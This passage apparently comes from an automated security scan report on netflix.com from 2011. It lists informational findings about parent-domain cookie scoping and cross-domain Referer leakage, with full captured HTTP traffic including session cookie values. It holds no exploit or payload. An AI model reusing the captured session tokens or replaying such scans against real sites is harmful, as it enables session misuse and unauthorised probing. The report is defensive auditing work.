20:27:08 GMT; Path=/ vstCnt=1~1~1313414828578; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Gift?gctrkid=67041862 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; __qca=P0-1419279816-1313440086339; vstCnt=1~1~1313414824069; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440025702; nflxsid=112.1313440025702; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440025706~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjU3MDY6OnRjdz0xJmNxcz06"
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:27:08 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:27:08 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440028555; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Set-Cookie: nflxsid=112.1313440028556; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:08 GMT; Path=/Set-Cookie: miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440028571~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjg1NzE6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:08 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414828578; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Vary: Accept-Encoding Content-Length: 17994 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440028555, serverBeforeHtml: 1313440028580 };</script> <meta h...[SNIP]...
3.10. http://www.netflix.com/MediaCenter
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/MediaCenter
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313439891610; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:24:51 GMT; Path=/ nflxsid=112.1313439891610; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439891614~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:24:51 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4OTE2MTQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:24:51 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MediaCenter HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313439869400; nflxsid=112.1313439869400; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439869403~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4Njk0MDM6OnRjdz0xJmNxcz06"; miscCache=0001oqclemLBuncTYzjfnhkxDP3armc=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; vstCnt=1~1~1313414669406
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:24:50 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:24:51 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313439891610; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439890548~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:24:51 GMT; Path=/ Set-Cookie: nflxsid=112.1313439891610; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:24:51 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313439891614~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:24:51 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0Mzk4OTE2MTQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:24:51 GMT; Path=/ Vary: Accept-Encoding Content-Length: 28638 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313439891617, serverBeforeHtml: 1313439891617 };</script> <meta h...[SNIP]...
3.11. http://www.netflix.com/NetflixReadyDevices
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/NetflixReadyDevices
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440302429; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440301383~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ nflxsid=112.1313440302430; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440302433~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzMDI0MzQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:42 GMT; Path=/ vstCnt=1~1~1313415102436; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /NetflixReadyDevices?lnkce=nrd-o&lnkctr=nmf_nfrd&trkid=496634 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; lastHitTime=1313440265208; nflxsid=112.1313440265209; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440265212~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAyNjUyMTM6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313415065215; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:31:41 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:31:42 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440302429; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440301383~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Set-Cookie: nflxsid=112.1313440302430; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:42 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440302433~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzMDI0MzQ6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:31:42 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415102436; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:31:42 GMT; Path=/ Vary: Accept-Encoding Content-Length: 18784 <!DOCTYPE HTML> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript">var RoundTripIn...[SNIP]...
3.12. http://www.netflix.com/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440370951; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440344198~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ nflxsid=112.1313440370951; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440370955~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzNzA5NTU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:32:50 GMT; Path=/ vstCnt=1~1~1313415170958; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /SubGenreList/Action_Adventure/296/Comic_Books_and_Superheroes/642 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/AllGenresList User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; lastHitTime=1313440027472; nflxsid=112.1313440027472; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:32:50 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:32:50 GMT Content-Type: text/html;charset=UTF-8Set-Cookie: lastHitTime=1313440370951; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440344198~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ Set-Cookie: nflxsid=112.1313440370951; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:32:50 GMT; Path=/Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440370955~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAzNzA5NTU6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:32:50 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313415170958; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:32:50 GMT; Path=/ Vary: Accept-Encoding Content-Length: 41456 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440370951, serverBeforeHtml: 1313440370959 };</script> <meta h...[SNIP]...
3.13. http://www.netflix.com/clickstats
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/clickstats
Issue detail
The following cookies were issued by the application and is scoped to a parent of the issuing domain:lastHitTime=1313440044319; Domain=.netflix.com; Path=/ VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:24 GMT; Path=/ nflxsid=112.1313440044320; Domain=.netflix.com; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /clickstats HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/ContactUs Content-Length: 94 Origin: http://www.netflix.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; custProps=; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjc0ODY6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313414827493; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440035342; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; nflxsid=112.1313440035342 page=ClickStats.ContactUs&href=https%3A%2F%2Fwww.netflix.com%2FBillingActivity%3Flnkctr%3DcuBH
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 15 Aug 2011 20:27:23 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Location: http://www.netflix.com/entryTrap.jsp?why=hyperactiveSet-Cookie: lastHitTime=1313440044319; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:24 GMT; Path=/ Set-Cookie: nflxsid=112.1313440044320; Domain=.netflix.com; Path=/ Vary: Accept-Encoding Cache-Control: private Content-Length: 0 Content-Type: text/plain
4. Cross-domain Referer leakage
previous
next
There are 5 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
4.1. http://www.netflix.com/Default
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Default
Issue detail
The page was loaded from a URL containing a query string:http://www.netflix.com/Default? The response contains the following link to another domain:http://cdn-0.nflximg.com/us/labels/1px.gif
Request
GET /Default? HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive Referer: http://www.netflix.com/Movie/Iron-Man-2/70111470?trkid=813619 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; __qca=P0-1419279816-1313440086339; miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; lastHitTime=1313440473093; nflxsid=112.1313440473093; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440473097~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDA0NzMwOTc6OnRjdz0xJmNxcz06"; vstCnt=1~1~1313415273099; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/
Response
HTTP/1.1 403 Forbidden Date: Mon, 15 Aug 2011 20:40:18 GMT Server: Apache Cache-Control: no-cache Pragma: no-cache Last-Modified: Wed, 09 Mar 2011 22:33:19 GMT Accept-Ranges: bytes Vary: Accept-Encoding Cache-Control: private Content-Length: 2444 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Netflix Site Err...[SNIP]... <a href="http://www.netflix.com/Default"><img src="http://cdn-0.nflximg.com/us/labels/1px.gif" height=40 width=120 alt="Netflix - Discover Movies You'll Love" Title="Netflix - Discover Movies You'll Love" border=0> </a>...[SNIP]...
4.2. http://www.netflix.com/Gift
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.netflix.com
Path:
/Gift
Issue detail
The page was loaded from a URL containing a query string:http://www.netflix.com/Gift?gctrkid=67041862 The response contains the following links to other domains:http://cdn-0.nflximg.com/us/icons/nficon.ico http://cdn-0.nflximg.com/us/layout/gift/oct2008/button_blue_buy.gif http://cdn-0.nflximg.com/us/layout/signup/950/header/netflix_logo.gif http://www.netflixprize.com/
Request
GET /Gift?gctrkid=67041862 HTTP/1.1 Host: www.netflix.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NetflixSession=112.1e2e3251-3515-4814-b345-95fe1d50c31f; NSC_ED1-xxx=ffffffff09c8016145525d5f4f58455e445a4a422d69; asearch=131343986063011112; NetflixCookies=persistent; ecssn=eyJjb20ubmV0ZmxpeC5lYy51aWNvbW1vbi5jb250ZXh0LlZpc2l0b3JTZXNzaW9uIjpbeyJtYXAiOlt7ImVudHJ5IjpbeyJzdHJpbmciOlsidiIsIjAwMSJdfSx7InN0cmluZyI6WyJkbnNwYyIsdHJ1ZV19XX1dfV19; miscCache=000131kQ7I/YA8wiAIC2m8z/Tu1b/8I=!!&masqueradeSession=-1&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; __qca=P0-1419279816-1313440086339; vstCnt=1~1~1313414824069; p_id=2828PJJP6PRPRLNJ6262A8N2H8LR8J2H4A; p_first_ref=; p_first_entry=https%3A//www.netflix.com/; p_last_ref=; s_id=AP28PJJP6PRPRAN6A862A8N2H8LR8J2H4A; s_entry=https%3A//www.netflix.com/; lastHitTime=1313440025702; nflxsid=112.1313440025702; custProps=; VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440025706~; nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjU3MDY6OnRjdz0xJmNxcz06"
Response
HTTP/1.1 200 OK Date: Mon, 15 Aug 2011 20:27:08 GMT Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA" Cache-Control: private Pragma: no-cache Expires: Sun, 14 Aug 2011 20:27:08 GMT Content-Type: text/html;charset=UTF-8 Set-Cookie: lastHitTime=1313440028555; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440027486~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Set-Cookie: nflxsid=112.1313440028556; Domain=.netflix.com; Path=/ Set-Cookie: custProps=; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:08 GMT; Path=/ Set-Cookie: miscCache=0001BaxV73woW1lgtt176vbOITHXrP8=!!&masqueradeSession=-1&giftTrackingCode=67041862&giftCustomize&promotionID=60184945&accountRestartDate&hasPurchasedPlayer&isFirstVisit=Y&lastTabBeforeStartSignup=DEFAULT&callerAuthId=888+000&callerAuthUpdateDate=0&signupTestExclusionReason&nrdContext=&browserWindowSizeCollected=Y; Domain=.netflix.com; Path=/ Set-Cookie: VisitorId=002~299aa744-df3e-4d3c-9d31-50aa09376c29~1313439857009~false~1313440028571~; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Set-Cookie: nmp="MDAxOjUxNDAxOTE1OjEzMTM0NDAwMjg1NzE6OnRjdz0xJmNxcz06"; Domain=.netflix.com; Expires=Wed, 14-Sep-2011 20:27:08 GMT; Path=/ Set-Cookie: vstCnt=1~1~1313414828578; Domain=.netflix.com; Expires=Tue, 14-Aug-2012 20:27:08 GMT; Path=/ Vary: Accept-Encoding Content-Length: 17994 <!DOCTYPE HTML> <html> <head> <script type="text/javascript">var RoundTripInfo = { htmlStart: (new Date()).getTime(), serverStart: 1313440028555, serverBeforeHtml: 1313440028580 };</script> <meta h...[SNIP]... <meta name="save" content="history"><link rel="shortcut icon" href="http://cdn-0.nflximg.com/us/icons/nficon.ico"> <link rel="canonical" href="http://www.netflix.com/Gift">...[SNIP]... <a 